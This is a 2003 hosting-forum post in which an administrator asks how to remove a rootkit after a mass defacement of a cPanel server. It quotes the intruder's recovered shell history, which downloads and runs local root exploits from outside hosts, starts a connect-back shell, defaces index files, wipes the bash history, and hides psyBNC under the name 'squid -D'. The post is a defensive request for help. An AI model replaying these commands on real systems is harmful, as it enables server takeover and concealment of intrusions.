Thread: new server got hacked
View Single Post
  #1 (permalink)  
Old 12-11-2003, 11:45 AM
brumie brumie is offline
Registered User
  
Join Date: Dec 2003
Posts: 40
brumie
new server got hacked
just got hacked
moving to new server and after few hours got hacked

all index.* has been replaced
including all cpanel themes and all clients

so when u logged on http://server/cpanel
http://server/webmail
all you see is the hacker page
http://vipixel.com/hacked.jpg

I can delete the username techteam which uid is 0
but how to remove the hidden Trojan?
says it has hidden pid

uid 0 account (techteam) - BAD!
--> Hidden Pid detected! [pid 10]
--> hidden from ps: [yes]
--> hidden from kernel: [yes]

here's the log i can grab:
Code:
ls
./pt
./kmod
./own
./klogd
./kmod
rm kmod
rm -rf kmod
wget www.viperhaxu.hpg.com.br/ptrace
chmod ptrace
chmod 777 ptrace
./ptrace
wget www.skater0x.hpg.com.br/local/kmod
chmod 777 kmod.1
./kmod.1
./newlocal
gcc fedor.c -o fedor
ls
./f
uname -a
chmod 777 f
./f
id
pwd
wget www.skater0x.hpg.com.br/xpll/cancer
echo SU3D OWNZ > index.txt
chmod 777 cancer
./cancer index.txt
ls
rm bind.txt
ls -la
cat .bash_history
ls
./kmod
./cbd
./cbd 10.28.88.142
cat fedor.c
./f
./ptrace
c
./pt
z
ls
ls
./setuid
id
./ptrace
./own
./ptrace
wget www.creatividade.hpg.com.br/locals
chmod 777 locals
./locals
./locals
./locals
rm -rf locals
ls
./ptrace
echo lol >.bash_history
ls
./td
id
./pt
id
./td
ls
w
id
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
wget thecoreteam.home.ro/pt
chmod +x pt
./pt
./pt
./pt
./pt
./pt
wget www.geocities.com/sorin_smen/psybnc.tgz
ls
rm -rf *
cd ..
ls
rm -rf *
ls
./newlocal
./localroot
./own
./kmod
rm -rf *
chmod +wrx setuid
id
ls -all
ls
rm -rf sess_fc187590539417321dd72b37686e7e27
cd www.geocities.com/sorin_smen/psybnc.tgz
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
wget www.geocities.com/sorin_smen/psybnc.tgz
tar zxvf psybnc.tgz
cd psybnc
./psybnc
kill -9 32751
rm -rf psybnc.conf
wget thecoreteam.home.ro/psybnc.conf
mv psybnc "squid -D"
./"squid -D"
exit
id
./km
ls
ls -al km
./km
./km
./km;./km;./km
exit
i run this:
[~/apps/chkrootkit-0.42b]# ./chkrootkit
Checking `bindshell'... INFECTED (PORTS: 465)
but seem false alarm...

how to clearly remove the trojan file?
please please help.
FYI server updated to latest kernel 2.4.23
but we're still worried about this mass defacement attack.

mind to share tips and tricks security setting for WHM/CPanel?

Thanks in advance,
Brumie
Reply With Quote